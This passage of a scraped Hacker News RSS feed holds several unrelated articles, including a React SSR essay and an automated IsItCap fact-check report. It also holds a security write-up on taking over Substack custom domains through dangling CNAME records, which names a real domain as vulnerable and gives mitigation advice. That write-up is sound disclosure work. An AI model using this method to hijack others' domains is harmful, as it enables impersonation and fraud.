    Got your own favorite RSS feed? We’ve added the option to add custom channels so you can bring in the news sources you love most. Once your feed is connected, we’ll convert those articles into lessons, too. You’ll see them listed in the same timeline, ready for you to learn from.
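
    As a rough illustration of the idea (not Topics' actual pipeline; the field names and lesson shape here are assumptions), reducing an RSS channel to lesson stubs could look something like this:

    // Fetch an RSS feed and pull out the fields a lesson generator would need.
    // A real pipeline would use a proper XML parser; regexes keep the sketch short.
    type LessonStub = { title: string; url: string; publishedAt: string };

    async function fetchLessonStubs(feedUrl: string): Promise<LessonStub[]> {
      const xml = await (await fetch(feedUrl)).text();
      const items = [...xml.matchAll(/<item>([\s\S]*?)<\/item>/g)];
      return items.map((m) => ({
        title: /<title>(?:<!\[CDATA\[)?(.*?)(?:\]\]>)?<\/title>/.exec(m[1])?.[1] ?? "",
        url: /<link>(.*?)<\/link>/.exec(m[1])?.[1] ?? "",
        publishedAt: /<pubDate>(.*?)<\/pubDate>/.exec(m[1])?.[1] ?? "",
      }));
    }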

    We hope this makes tackling real-world news in your target language feel less intimidating and a whole lot more fun.

    ]]>
    https://my-topics.io/newsroom/turning-news-into-topics/ hacker-news-small-sites-43230824 Sun, 02 Mar 2025 14:29:33 GMT
    <![CDATA[Show HN: Hello, World – Introducing Soj.ooO]]> thread link) | @rasengan
    March 2, 2025 | https://soj.ooo/p/sojooo/post/f1563392ba0d6de4552ba2b9effabf90 | archive.org

    Unable to retrieve article]]>
    https://soj.ooo/p/sojooo/post/f1563392ba0d6de4552ba2b9effabf90 hacker-news-small-sites-43230558 Sun, 02 Mar 2025 14:00:43 GMT
    <![CDATA[My friend just built an app to spot fake news]]> thread link) | @johnnycasher
    March 2, 2025 | https://isitcap.com/report/does-college-turn-you-woke | archive.org

    52%

    IsItCap Score

    Truth Potential Meter

    Somewhat Credible

    Analysis Summary

    Verdict: Partially True


    Based on our comprehensive analysis, the claim that college turns you woke is partially supported but largely nuanced. The mainstream sources suggest that colleges do promote political awareness and engagement, which could be interpreted as contributing to a more woke student body. However, conflicting sources argue that the stereotype of woke campuses is often exaggerated and based on misinformation.

    The evidence supporting this conclusion includes studies showing higher education enhances civic engagement and promotes political literacy, but these outcomes do not necessarily equate to wokeness as commonly perceived.

    In considering the broader context, the term woke is highly subjective and politicized, making it difficult to definitively conclude whether colleges turn students woke. Ultimately, while colleges do contribute to political awareness, the claim is more complex than a simple true or false.

    Category 1: Evidence & Source Integrity

    True/False Spectrum: 5.34 / 10

    Source Credibility & Track Record: 7.92 / 10

    Bias & Independence Assessment: 6.15 / 10

    Category 2: Claim & Contextual Analysis

    Contextual Integrity & Accuracy: 8.27 / 10

    Content Coherence & Logical Consistency: 8.49 / 10

    Expert & Consensus Alignment: 5.81 / 10

    Source Analysis

    Mainstream Sources

    Navigating Election Year Dynamics: The Impact on College Campuses

    Election years bring heightened political engagement to college campuses, fostering debates and civic participation. Colleges provide educational opportunities and support activism, promoting informed citizenship. However, this increased political activity can also lead to ideological tensions.

    • Increased political awareness and engagement
    • Promotion of civic learning and engagement
    • Challenges such as ideological tensions

    The Role of Universities in Fostering Political Awareness among Students

    Universities play a crucial role in fostering political awareness by providing diverse courses and activities, promoting student participation in political life. This cultivation of political awareness could be seen as contributing to a more 'woke' or politically conscious student body.

    • Universities encourage political participation and awareness
    • Courses and activities promote political literacy

    American Sociological Association

    Higher Education Experiences and Political Engagement

    Higher education is associated with increased civic engagement. Specific college experiences, like social sciences coursework and community projects, enhance political engagement, potentially leading to a more 'woke' or engaged citizenry.

    • Higher education correlates with civic engagement
    • Specific experiences enhance political participation

    Alternative Sources

    Does Higher Education Promote Wokeness?

    Some conservative viewpoints argue that higher education institutions are overly focused on promoting progressive ideologies, which they term as 'wokeness'. However, this perspective often aligns with political biases rather than empirical evidence.

    • Criticism of progressive ideologies in academia
    • Concerns about ideological imbalance

    The Myth of the 'Woke' Campus

    This article challenges the notion that colleges are overly 'woke', suggesting that such perceptions are exaggerated and often based on misinformation or stereotypes.

    • Critique of the 'woke campus' stereotype
    • Arguments against the idea of widespread 'wokeness'

    College Campuses Are Not as 'Woke' as You Think

    This article suggests that the idea of colleges being uniformly 'woke' is overstated, pointing to diversity of opinions and experiences on campuses.

    • Diversity of opinions on college campuses
    • Challenges to the stereotype of widespread 'wokeness'

    Analysis Breakdown

    True/False Spectrum (5.3) · Source Credibility (7.9) · Bias Assessment (6.2) · Contextual Integrity (8.3) · Content Coherence (8.5) · Expert Consensus (5.8); overall 70%
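
    Incidentally, the 70% figure appears to be the plain average of the six category scores, scaled to a percentage; this is an inference from the numbers shown, not anything IsItCap documents:

    // Averaging the six category scores reproduces the 70% in the breakdown.
    const scores = [5.34, 7.92, 6.15, 8.27, 8.49, 5.81];
    const average = scores.reduce((a, b) => a + b, 0) / scores.length;
    console.log(`${Math.round(average * 10)}%`); // "70%"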

    Understanding the Grades

    Metrics

    • Verifiability: Evidence strength
    • Source Quality: Credibility assessment
    • Bias: Objectivity measure
    • Context: Completeness check

    Scale

    • 8-10: Excellent
    • 6-7: Good
    • 4-5: Fair
    • 1-3: Poor

    Detailed Analysis

    The term 'woke' is inherently subjective and carries various connotations depending on the ideological perspective of the individual using it. The original claim that 'college turns you woke' is nebulous and cannot be quantified with precision.

    The analysis provided uses a range of mainstream and conflicting sources that address the influence of higher education on students' political awareness. Some sources correlate higher education with increased political engagement and awareness, which could contribute to a perception of 'wokeness'.

    However, the concept of 'wokeness' itself is not rigorously defined in these studies, leading to ambiguity in the claim's assessment. Additionally, the conflicting sources suggest that the notion of uniformly 'woke' campuses might be overstated and influenced by biases or stereotypes.

    Key Points

    • Varying definitions of 'wokeness' lead to subjective interpretations.
    • Mainstream sources report on the correlation between higher education and political engagement.
    • Conflicting sources suggest that claims of uniformly 'woke' campuses are exaggerated.
    • Lack of empirical evidence to directly support the claim that college 'turns' students 'woke'.

    The selection of sources includes reputable educational and sociological publications as well as ideologically oriented media. Honors Society and Clausius Press are educational platforms that may carry institutional biases towards presenting higher education in a positive light.

    The American Sociological Association is a respected organization, but its publications can reflect the perspectives prevalent within the academic community. On the other end, The National Review and Politico are known to have conservative and liberal editorial slants, respectively.

    The Guardian is a mainstream media outlet with a reputation for progressive reporting. The evaluation of these sources should consider their potential institutional biases and narrative alignments.

    Key Points

    • American Sociological Association for its academic standing.
    • The National Review for representing a conservative viewpoint.
    • The Guardian and Politico for bringing mainstream media perspectives.

    The provided analysis demonstrates a spectrum of biases, from academic institutions potentially promoting their own value, to mainstream and ideologically driven media outlets presenting conflicting views on higher education's impact on students' political leanings. The term 'woke' itself is often used pejoratively by conservative outlets, while progressive sources may embrace or dismiss it based on context.

    This reflects a divide in how 'wokeness' is perceived and reported, with each side carrying potential financial motivations to cater to their respective audiences. The timing of narrative shifts, particularly around election years or cultural flashpoints, can also affect the framing of 'wokeness' in higher education.

    Key Points

    • Institutional bias from educational sources.
    • Ideological bias from media outlets.
    • Financial motivations to appeal to specific audiences.
    • Narrative shifts influenced by cultural or political events.

    The context surrounding the original claim is rich with historical and cultural layers. Higher education has a long history of being a battleground for political ideas and movements.

    The analysis touches upon this by acknowledging the role of colleges in fostering political engagement. However, it does not delve deeply into the historical patterns of student activism, the evolution of political discourse on campuses, or the power structures within academia that influence these dynamics.

    Additionally, the broad use of the term 'woke' lacks historical context, as its meaning has shifted over time and across different social landscapes.

    Key Points

    • Historical role of colleges in political movements.
    • Evolution of political discourse on college campuses.
    • Power structures within academia influencing political engagement.
    • The shifting meaning of 'woke' over time.

    The origin of the claim 'college turns you woke' likely stems from observations of student activism and the role of colleges in promoting social and political awareness. However, the analysis does not deeply investigate the flow of information through alternative networks or seek early mentions of the claim on deep web forums or in whistleblower testimonies.

    There is also a lack of examination of parallel historical patterns, such as the influence of past educational reforms on student political leanings, or the suppression of precursor events that may have led to the current framing of the claim.

    Key Points

    • Observations of student activism.
    • Colleges' role in promoting political awareness.
    • Lack of investigation into alternative networks.
    • Absence of historical pattern analysis.

    While the analysis does provide a variety of perspectives from different sources, it may not fully explore the deeper layers of alternative media, foreign language alternative sources, and blockchain-preserved information. There is potential for hidden angles such as the impact of international student movements on the American college political landscape, or the exploration of how deep web communities discuss the influence of academia on student ideology.

    The analysis could also benefit from an investigation into patterns of removed content that may have contained dissenting views or evidence counter to the prevailing narratives.

    Key Points

    • Impact of international student movements on U.S. campuses.
    • Discussions on deep web communities regarding academic influence.
    • Patterns of removed content with dissenting views or evidence.


    ]]>
    https://isitcap.com/report/does-college-turn-you-woke hacker-news-small-sites-43230515 Sun, 02 Mar 2025 13:56:26 GMT
    <![CDATA[Elon Musk backs US withdrawal from NATO alliance]]> thread link) | @dtquad
    March 2, 2025 | https://ukdefencejournal.org.uk/elon-musk-backs-us-withdrawal-from-nato-alliance/ | archive.org

    Elon Musk, a key figure in President Donald Trump’s administration and head of the United States Department of Government Efficiency, has backed calls for the United States to leave the North Atlantic Treaty Organisation (NATO).

    Musk voiced his support on X (formerly Twitter) on Saturday night when he responded “I agree” to a post stating, “It’s time to leave NATO and the UN.” His endorsement aligns with growing calls from some Republican lawmakers, including Senator Mike Lee, to reconsider the US commitment to the alliance.

    Lee, a long-time critic of NATO, has described it as a “Cold War relic” and argued that the alliance “has to come to a halt.” He claims NATO is a “great deal for Europe” but a “raw deal for America”, suggesting that US resources are being stretched to protect Europe while offering little direct benefit to American security.

    Musk’s comments come amid broader discussions within the Trump administration over the future of America’s role in NATO and international alliances.

    While Trump has not explicitly stated his intent to withdraw from NATO, he has repeatedly pressured European nations to increase their defence spending, warning that the US should not bear the financial burden of the alliance alone.

    As a key figure in the administration, Musk’s influence on Trump’s policy decisions is significant. His endorsement of a NATO withdrawal could signal growing momentum within the White House for a shift towards a more isolationist foreign policy, focusing on domestic defence priorities over international commitments.

    With the war in Ukraine ongoing and NATO playing a critical role in supplying military aid, any US withdrawal would drastically reshape the global security landscape. European leaders have already expressed concerns over Trump’s stance on NATO, particularly as the alliance works to counter Russian aggression and maintain stability in Eastern Europe.

    Despite Musk and Lee’s calls for withdrawal, Trump has continued to engage with NATO leaders, recently hosting UK Prime Minister Keir Starmer in Washington for discussions on European security. However, with Trump’s administration pushing for major shifts in US foreign policy, NATO’s future role in American defence strategy remains uncertain.

    ]]>
    https://ukdefencejournal.org.uk/elon-musk-backs-us-withdrawal-from-nato-alliance/ hacker-news-small-sites-43230324 Sun, 02 Mar 2025 13:31:26 GMT
    <![CDATA[Heima App: A Home Management App Built with Passion]]> thread link) | @danielkaldheim
    March 2, 2025 | https://kaldheim.org/posts/heima-home-management-app-built-with-passion/ | archive.org

    Unable to retrieve article]]>
    https://kaldheim.org/posts/heima-home-management-app-built-with-passion/ hacker-news-small-sites-43229769 Sun, 02 Mar 2025 12:26:03 GMT
    <![CDATA[YouTube Dominates Podcasting with over 1B Monthly Viewers]]> thread link) | @geox
    March 2, 2025 | https://digitalmarketreports.com/news/34875/youtube-dominates-podcasting-with-over-1-billion-monthly-viewers/ | archive.org

    YouTube announced on Wednesday that it has surpassed 1 billion monthly active podcast viewers, marking a significant milestone in the podcasting industry. The platform continues to assert its dominance, positioning itself as a formidable rival to Spotify, the other major player in this space. With the growing consumer preference for video-first formats, YouTube’s popularity underscores the shifting dynamics in how audiences consume podcast content.

    Changes to Mid-Roll Ads and Enhancing the Viewing Experience

    To further enhance user experience and support creators, YouTube plans to implement changes to its mid-roll ads starting May 12. These modifications will strategically place advertisements at natural break points, such as pauses and transitions within videos. This approach aims to improve the viewing experience while enabling creators to earn more revenue from their content. YouTube’s model of sharing billions in ad revenue with creators plays a crucial role in fostering a thriving ecosystem for content producers.

    In its quest to remain competitive, Spotify has increased its investment in video-first podcasting. In November 2024, Spotify began paying popular video hosts in an effort to attract both talent and users. This strategic move highlights Spotify’s commitment to embracing video content as a means to expand its reach and strengthen its position in the industry.

    The rise of YouTube in the podcasting arena is further evidenced by the staggering 400 million hours of podcast content watched on living room TVs last year. This figure reveals the growing trend of audiences favoring video platforms for consuming podcasts, aligning with the broader shift towards multimedia content consumption.

    As YouTube continues to innovate and expand its offerings, it remains a dominant force in the podcasting landscape. The platform’s commitment to enhancing user experience through changes like improved mid-roll ads reflects its dedication to maintaining its leadership position. Meanwhile, Spotify’s efforts to integrate video content demonstrate the evolving nature of competition in this dynamic industry.

    Author’s Opinion

    YouTube’s continued dominance in the podcasting industry, especially with its push towards video-first content, makes it clear that the platform’s evolution is in tune with audience preferences. While Spotify’s efforts are commendable, YouTube’s ability to leverage video formats in podcast consumption places it in a unique position for long-term leadership. As both platforms refine their strategies, the competition will only intensify, further benefiting consumers and creators alike.



    ]]>
    https://digitalmarketreports.com/news/34875/youtube-dominates-podcasting-with-over-1-billion-monthly-viewers/ hacker-news-small-sites-43229285 Sun, 02 Mar 2025 11:10:25 GMT
    <![CDATA[There's no such thing as an isomorphic layout effect]]> thread link) | @thunderbong
    March 2, 2025 | https://smoores.dev/post/no_such_thing_isomorphic_layout_effect/ | archive.org

    Feb. 22, 2025

    So, recently, React ProseMirror added support for server-side rendering. If you read my post about how React ProseMirror works, you may already know that React ProseMirror relies fairly heavily on React’s useLayoutEffect hook for reading data from the DOM after render. And if you’re familiar with server-side rendering, you may be familiar with what happens when you render a component that uses useLayoutEffect on the server:

    Warning: useLayoutEffect does nothing on the server, because its effect
    cannot be encoded into the server renderer's output format. This will
    lead to a mismatch between the initial, non-hydrated UI and the intended
    UI. To avoid this, useLayoutEffect should only be used in components
    that render exclusively on the client. See
    https://reactjs.org/link/uselayouteffect-ssr for common fixes.

    It’s worth breaking down what this warning is actually trying to communicate, because it’s not especially straightforward. To start, we should review what useLayoutEffect is actually for. Like other React hooks, useLayoutEffect provides a mechanism for managing side effects. In particular, as the name implies, layout effects are meant to be side effects that read from the DOM, usually for the purpose of modifying the layout of a component. To allow this, React will execute a component’s render function, commit the changes to the DOM, and then immediately run its layout effects before the browser paints those DOM updates. This means that something like a tooltip component can evaluate the position of its anchor in a layout effect, update its state to reflect that position, and be re-rendered with that new state, all without the user ever seeing the tooltip in the wrong place.

    Now let’s walk through what happens when we server-side render a component like this. Below, we have an example application that uses a layout effect to position a tooltip:

    import { useLayoutEffect, useRef, useState } from "react";

    export function App() {
      const [tooltipTop, setTooltipTop] = useState(0);
      const [tooltipLeft, setTooltipLeft] = useState(0);
      const anchorRef = useRef<HTMLDivElement | null>(null);

      useLayoutEffect(() => {
        if (!anchorRef.current) return;
        // Read the anchor's position from the DOM after commit, before paint
        const rect = anchorRef.current.getBoundingClientRect();
        setTooltipTop(rect.top);
        setTooltipLeft(rect.left);
      }, []);

      return (
        <article>
          <h1>Positioned Tooltip Demo</h1>
          <div ref={anchorRef} />
          <p>A tooltip should be positioned above this paragraph.</p>
          <div style={{ position: "absolute", top: tooltipTop, left: tooltipLeft }}>
            This is the tooltip
          </div>
        </article>
      );
    }

    Because we’re using a layout effect, this component will actually be rendered twice on mount, with both renders occurring before the DOM has even been painted once. The result is that the tooltip will be correctly positioned on the very first paint, with the user only ever visually seeing a DOM represented by the following HTML:

    <article>
      <h1>Positioned Tooltip Demo</h1>
      <div></div>
      <p>A tooltip should be positioned above this paragraph.</p>
      <div style="position: absolute; top: 50px; left: 8px;">This is the tooltip</div>
    </article>

    But what happens when we render this component on the server? There is no DOM on the server at all, so React never executes layout effects. Instead, the component is rendered exactly once, using the default values for our state:

    <article>
      <h1>Positioned Tooltip Demo</h1>
      <div></div>
      <p>A tooltip should be positioned above this paragraph.</p>
      <div style="position: absolute; top: 0; left: 0;">This is the tooltip</div>
    </article>

    This means that in a server-side rendered context, until the client-side JavaScript bundle is loaded, parsed, and executed, the user will be looking at the wrong UI. The tooltip will simply be in the wrong place (at 0, 0). It will look broken!

    This is precisely the issue that React was trying to warn us about. Because effect hooks don’t execute on the server at all, server-side rendered UIs that rely on them may appear broken until they’re hydrated on the client. Following the link from the warning message takes us to a GitHub Gist with two proposed solutions: replacing the useLayoutEffect with a useEffect, and conditionally rendering the component that uses useLayoutEffect only on the client. For our tooltip example, we should use the second option — it’s better to simply not render the tooltip at all until the client-side JavaScript has a chance to run and determine where it should be positioned.
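
    For our tooltip, that second fix might look something like the following minimal sketch, where Tooltip is a hypothetical component containing the useLayoutEffect measurement logic:

    import { useEffect, useState } from "react";
    import { Tooltip } from "./Tooltip"; // hypothetical component that uses useLayoutEffect

    export function ClientOnlyTooltip() {
      // `mounted` is false during the server render and the first client render,
      // so the server and hydration markup match; the tooltip only renders once
      // the client has taken over and can measure the DOM.
      const [mounted, setMounted] = useState(false);

      useEffect(() => {
        setMounted(true);
      }, []);

      if (!mounted) return null;
      return <Tooltip />;
    }

    Because the tooltip is simply absent from the server-rendered HTML, there is nothing mispositioned for the user to see before hydration.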

    Not all layout effects actually need to modify the layout, though. React ProseMirror, for example, uses layout effects internally to maintain ProseMirror’s view descriptor tree, which is roughly analogous to React’s virtual DOM. Because this requires reading from the DOM, but not modifying it, it’s actually safe to include in a server-side rendered component. But it’s a huge pain to fill up users’ server logs with warnings about useLayoutEffect that they can’t (and don’t need to) do anything about!

    If you’ve been around the server-side rendering block once or twice, you can probably see where this is going. The use-isomorphic-layout-effect library, or other implementations of it available from other popular libraries, is often the first tool that developers reach for when they encounter this warning. Let’s take a look at its implementation:

    use-isomorphic-layout-effect/src/index.ts

    import { useEffect, useLayoutEffect } from 'react'
    import isClient from '#is-client'

    export default isClient ? useLayoutEffect : useEffect

    Very simple! The library only runs useLayoutEffect if the code is running on the client (in the browser, this determined via typeof document !== "undefined"). On the server, instead, it runs… useEffect, instead? That’s sort of odd. Effects never execute on the server — why would we bother running useEffect there?

    And it’s not just this library that’s made this somewhat odd choice of no-op. Here’s react-use’s implementation:

    const useIsomorphicLayoutEffect = isBrowser ? useLayoutEffect : useEffect;

    The Mantine design system:

    export const useIsomorphicEffect = typeof document !== 'undefined' ? useLayoutEffect : useEffect;

    React Beautiful DnD:

    const useIsomorphicLayoutEffect =
      typeof window !== 'undefined' &&
      typeof window.document !== 'undefined' &&
      typeof window.document.createElement !== 'undefined'
        ? useLayoutEffect
        : useEffect;

    In case it’s not clear why I’m so fascinated by this choice, here’s React ProseMirror’s implementation:

    import { useLayoutEffect } from "react";

    export function useClientLayoutEffect(
      ...args: Parameters<typeof useLayoutEffect>
    ) {
      if (typeof document === "undefined") return;
      useLayoutEffect(...args);
    }

    This implementation has precisely the same behavior as the implementations above. On the client, it calls useLayoutEffect, and on the server, it does nothing. I didn’t name it “isomorphic”, because it’s not really isomorphic — at least in the sense of “Isomorphic JavaScript”, which describes JavaScript code that runs on both the client and the server — as it doesn’t run on the server at all!

    Just to be clear, this doesn’t really matter. I’m not arguing that no one should ever use use-isomorphic-layout-effect, or that all of these libraries need to change their implementations of this function to use an explicit no-op instead of useEffect on the server. I am, however, curious about where this surprisingly ubiquitous quirk of the React ecosystem came from. And I have a hypothesis.

    In February of 2019, the React team released React 16.8, the first stable release of React that included hooks. Two months later, React Redux released their v7, which included a new hooks-based integration between React and Redux. And wouldn’t you know it:

    // React currently throws a warning when using useLayoutEffect on the server.
    // To get around it, we can conditionally useEffect on the server (no-op) and
    // useLayoutEffect in the browser. We need useLayoutEffect because we want
    // `connect` to perform sync updates to a ref to save the latest props after
    // a render is actually committed to the DOM.
    const useIsomorphicLayoutEffect =
      typeof window !== 'undefined' ? useLayoutEffect : useEffect

    ...

    // We need this to execute synchronously every time we re-render. However, React warns
    // about useLayoutEffect in SSR, so we try to detect environment and fall back to
    // just useEffect instead to avoid the warning, since neither will run anyway.
    useIsomorphicLayoutEffect(() => {

    Make sure to read those comments — the React Redux team seems fully aware that useEffect is a mere no-op here. React Beautiful DnD’s implementation actually directly references this React Redux code. Other implementations likely either copied from one of these two popular libraries, or from this Medium post from a few weeks later.

    From what I can tell, a very popular, well maintained library made an early, arbitrary implementation decision. Because copying this library felt like a safe bet to other library maintainers, this arbitrary decision became the de facto implementation for this workaround. A Medium post about this implementation became so widely read that it’s still the number one Google result for the query “useLayoutEffect ssr warning”, several slots above the GitHub Gist discussing the correct solution for most use cases.

    Even though I had an explanation, this kept itching at me. This is partly due to the description of the use-isomorphic-layout-effect library, which reads:

    A React helper hook for scheduling a layout effect with a fallback to a regular effect for environments where layout effects should not be used (such as server-side rendering).

    There is no mention here that useEffect is a mere no-op in those situations. It also seems to describe the problem space somewhat incorrectly — if a given layout effect actually should not be used in server-side rendering, then the component using it almost certainly should not be server-side rendered at all. Falling back to a plain effect in that situation is precisely as incorrect as using a layout effect — only without a warning to guide you toward the correct solution.

    react-use’s useIsomorphicLayoutEffect hook has a somewhat more accurate description:

    useLayoutEffect that does not show warning when server-side rendering, see Alex Reardon’s article for more info.

    But it also lacks any detail about when it’s appropriate to use this hook in place of useLayoutEffect. And, worse, on the main README for react-use, the description for the hook reads:

    useLayoutEffect that that [sic] works on server.

    Which is not correct. This hook, like all other “isomorphic” layout effect hooks, has exactly the same behavior as useLayoutEffect, minus the warning. It does not work on the server!

    I may be reading far too much into this very scant story, but I began to see a narrative unfold the further I looked into this:

    A maintainer for a very popular open source library, in the midst of a big refactor, made an essentially arbitrary decision to work around a noisy warning that wasn’t relevant to their use case. They seem to have done this with full knowledge that their decision was arbitrary, and left a comment explaining it.

    Another maintainer for a similarly popular open source library also needed to work around the warning, which was similarly irrelevant to their use case. They saw this workaround and decided to copy it as-is, leaving only link to the original (which has since been replaced) as explanation.

    A developer, frustrated by the warning, found these libraries’ workaround and authored a short blog post touting it as a way to quiet the warning. They seem to at least somewhat misunderstand the purpose of the warning (or maybe they fully understand it, but didn’t fully explain), and don’t clarify in their post that the choice of useEffect is essentially arbitrary.

    As more developers migrated to use React hooks, more developers ran into this warning and began searching for solutions. Some of them published the solution from Reardon’s blog post in their own libraries, and others found Reardon’s post and implemented his approach themselves.

    At each step in the saga, there’s less and less context. Even though the warning itself links to a GitHub Gist that explains the issue and solutions quite well, searching the language of the warning will retrieve Reardon’s post and other solutions before the linked Gist from the React team.

    As a result, the de facto solution to this “problem” doesn’t have sufficient context for users to understand how to use it effectively. The hugely popular React-Select library, for example, incorrectly uses use-isomorphic-layout-effect to position and scroll a menu, when it should instead avoid rendering the menu on the server at all. And I’m not trying to pick on React-Select — it seems likely that this is almost never an actual bug for them, since menus are likely always collapsed during the server render. But that is precisely the use case that the React team had in mind when they added the useLayoutEffect warning!

    To me at least, this is a reminder of why it’s important to understand why our code does what it does. It can be tempting to sit back and let sleeping dogs lie after finally finding the solution to a confounding bug. But it’s all too easy for those incomplete understandings to build up and slowly shift our intuition over time, until we find that our mental model of our problem space doesn’t match reality any longer.

    Oh, and React ProseMirror doesn’t trigger the layout effect warning during server-side rendering anymore!

    ]]>
    https://smoores.dev/post/no_such_thing_isomorphic_layout_effect/ hacker-news-small-sites-43229236 Sun, 02 Mar 2025 11:01:11 GMT
    <![CDATA[Substack Domain Takeover]]> thread link) | @joren485
    March 2, 2025 | https://blog.nietaanraken.nl/posts/substack-domain-takeover/ | archive.org

    Substack is a popular blogging platform. It allows writers to easily create their own personal blog, with payments, comments, analytics and other advanced features. Substack empowers writers to customize their blogs by adding a custom domain.

    In this blog, we will talk about an edge case that allows an attacker to take over inactive Substack blog custom domains.

    Introduction

When you create a blog on Substack, it will be available on the <username>.substack.com subdomain. If writers want their blog to look a bit more professional, they can add a custom domain. For example, instead of having your blog at https://michaelshellenberger.substack.com, you can use https://www.public.news/.

To set up a custom domain on Substack, a customer needs to create a CNAME record pointing from their domain to target.substack-custom-domains.com and add the domain to their blog settings:

    Before a customer is allowed to use a custom domain, however, they first have to pay a one-time $50 fee.

    Behind the scenes, Substack uses Cloudflare for SaaS to manage most of the custom domain heavy lifting. Cloudflare for SaaS allows companies to easily route customer domains to company infrastructure. When a customer adds a custom domain to their Substack blog, Substack will add the domain to their Cloudflare for SaaS account and Cloudflare will route requests to the custom domain to Substack. Whenever someone visits the custom domain, the request is sent to Substack. Substack then matches the requested domain to a blog to serve to the visitor.

    The Edge Case

Software that supports setting up a custom domain is a great target for domain takeover attacks, a type of attack where an attacker is able to control the content that is served on a victim domain.

    When a customer wants to stop using a custom domain for a Substack blog (e.g. because they want to stop publishing the blog), they will have to manually remove the CNAME record. But what if someone forgets to remove the CNAME record?

When a CNAME record exists for a custom domain and the domain is linked to a Substack blog, Substack will serve the blog without issue. However, if the CNAME record exists but the domain is not linked to a Substack blog, the domain will not be added to Substack's Cloudflare for SaaS account and Cloudflare will not know where to route requests for the domain. This results in an error from Cloudflare:

    A Cloudflare 1001 error for domains that are not managed by Cloudflare. A Cloudflare 1014 error for domains that are managed by Cloudflare.

    Taking over a subdomain

You may have noticed that Substack does not actually verify that a customer owns a domain when the customer adds it to their blog. The domain just needs a CNAME record that points to target.substack-custom-domains.com.

    This means that if someone accidentally adds a CNAME record to their domain, but does not add it to a Substack blog, anyone can add the domain to a Substack blog (they will also have to pay the $50 fee).

    Let’s look at denver.therollup.co, a domain that I do not have any association with. It has the correct CNAME:

    $ drill denver.therollup.co
    ...
    ;; ANSWER SECTION:
    denver.therollup.co.	253	IN	CNAME	target.substack-custom-domains.com.
    target.substack-custom-domains.com.	21	IN	A	172.64.151.232
    target.substack-custom-domains.com.	21	IN	A	104.18.36.24
    ...
    

    But it is not actually added to a blog:

    This allows anyone to add the domain to their own Substack blog and serve any content they want:

    Wildcard domains

    The above attack only works on domains that are no longer active. However, if someone sets up a wildcard CNAME record (e.g. *.example.com has a CNAME to target.substack-custom-domains.com), every domain under the wildcard record is vulnerable to a domain takeover.

    Discussion

Using DNS databases (such as SecurityTrails), I found 16,925 custom domains (i.e. domains that have a CNAME pointing to target.substack-custom-domains.com). Of these, 1,426 are not actually connected to a Substack blog and are, as such, vulnerable to domain takeover. More than 8% is a significant portion. Of these 1,426 domains, 11 are wildcard domains.

This is not a vulnerability in Substack, as Substack does not own or manage these domains. However, Substack could solve this problem for good by requiring customers to verify ownership of the domains they add (Cloudflare for SaaS supports this). This would require a bit more configuration on the customer's side, but would ultimately mean that these domain takeover attacks are no longer possible.

    However, Substack has another measure in place that will prevent some domain takeover attacks: the $50 fee to enable custom domains on a blog. $50 will not stop a motivated attacker, but it will prevent an attacker from taking over a domain just for fun. It is unclear whether Substack deliberately implemented the $50 fee as some sort of behavioral security measure, but it does have that effect.

    Mitigation

    If a domain has a CNAME record pointing to target.substack-custom-domains.com, either add it to a blog or remove the CNAME record. And never point a wildcard domain to target.substack-custom-domains.com.
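If you manage many domains, a small script makes this easy to audit. Here is a minimal sketch in Python (it assumes the third-party dnspython package; the domain list is illustrative):

import dns.resolver

SUBSTACK_TARGET = "target.substack-custom-domains.com"

def points_at_substack(domain: str) -> bool:
    # True if the domain still has a CNAME pointing at Substack.
    try:
        answers = dns.resolver.resolve(domain, "CNAME")
    except (dns.resolver.NoAnswer, dns.resolver.NXDOMAIN):
        return False
    return any(r.target.to_text().rstrip(".") == SUBSTACK_TARGET for r in answers)

for domain in ["denver.therollup.co", "newsletter.example.com"]:
    print(domain, points_at_substack(domain))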


    ]]>
    https://blog.nietaanraken.nl/posts/substack-domain-takeover/ hacker-news-small-sites-43229233 Sun, 02 Mar 2025 11:00:42 GMT
    <![CDATA[The Cup of Coffee Theory of AI]]> thread link) | @sebg
    March 2, 2025 | https://billyoppenheimer.com/the-cup-of-coffee-theory/ | archive.org

    This piece originally ran on Every.

    As the author Ryan Holiday’s research assistant, I’m worried about AI replacing me. 

    By most of the common psychological tests of intelligence, AI is smarter than me. AI can brainstorm more ideas than I can. AI can read a book, find information, fact check, and create content faster than I can.

    So I’ve considered going back to working in coffee shops.

After I graduated from college, I chased winter. I lived and skied all over Colorado during the Northern Hemisphere's winter months, and in Australia and New Zealand during the Southern Hemisphere's.

    To fund this year-round skiing, wherever I went, I worked part-time as a barista. When I think about my time working in coffee shops around the world, I find reasons to be optimistic about my job security.

    Coffee shops around the world all have the same powerful machines. They’ve science’d most parts of the process—how the beans are grown, the mineral composition of the water, the milks and the drinkware. So, unlike not that long ago, you can get a great latte, cappuccino, or flat white basically anywhere. 

    Yet many people still love their drip coffee with half and half. Many love their cheap store-bought beans brewed by their countertop coffee pot. And many don’t care—they just want their shot of caffeine.

    Coffee preferences are personal and abundant. The world is big enough for espresso machines and French presses. And which machine the barista uses depends on who they’re serving. 

    Art preferences are similar. So when I hear talk about how AI is going to replace artists, I think to myself, the world is big enough for both. Or when I see tweets about how AI wrote this “great” article or produced this “great” image, I ask myself, “great”—according to whom?

    Countless authors, painters, and inventors who were considered ordinary in their own time are revered in ours. And anyone who has made and released creative work has experienced something analogous to making a delicious espresso for an audience that prefers a French press.

    This is the perennial challenge of the artist: finding the middle of the Venn diagram where one circle is the artist’s tastes and the other is the audience’s tastes. 

    For the past two years, we’ve tried to hire another research assistant. We’ve trialed dozens of smart, creative, ambitious, book-loving, speedy fact-checking individuals. We always give them a version of the same assignment: read this book (usually a biography) and pull out two good anecdotes and two good quotes. What they come back with is not in the middle of that Venn diagram. 

    In a word, we’ve struggled for two years to find someone with taste—with an eye for what stands the chance of being interesting, entertaining, or useful to an audience. 

    We’re not alone. I’ve talked to authors, podcasters, documentarians, late-night TV writers, YouTubers and TikTokers, and they all share this problem. Most of these creators are actively or passively looking for people—whether researchers, writers, animators, video editors, producers, or production managers—with what Jerry Seinfeld identified as the ultimate skill of the artist: “taste and discernment.”  

    “It’s one thing to create,” Seinfeld said. “The other is you have to choose. ‘What are we going to do, and what are we not going to do?’ This is a gigantic aspect of [artistic] survival. It’s kind of unseen—what’s picked and what is discarded—but mastering that is how you stay alive.”

    Tools like ChatGPT are great at creating. AI can generate options in high quantities at high speed. It is great at providing more choices. But it is not great at discerning and choosing what to do and what not to do. For example, I prompted ChatGPT:

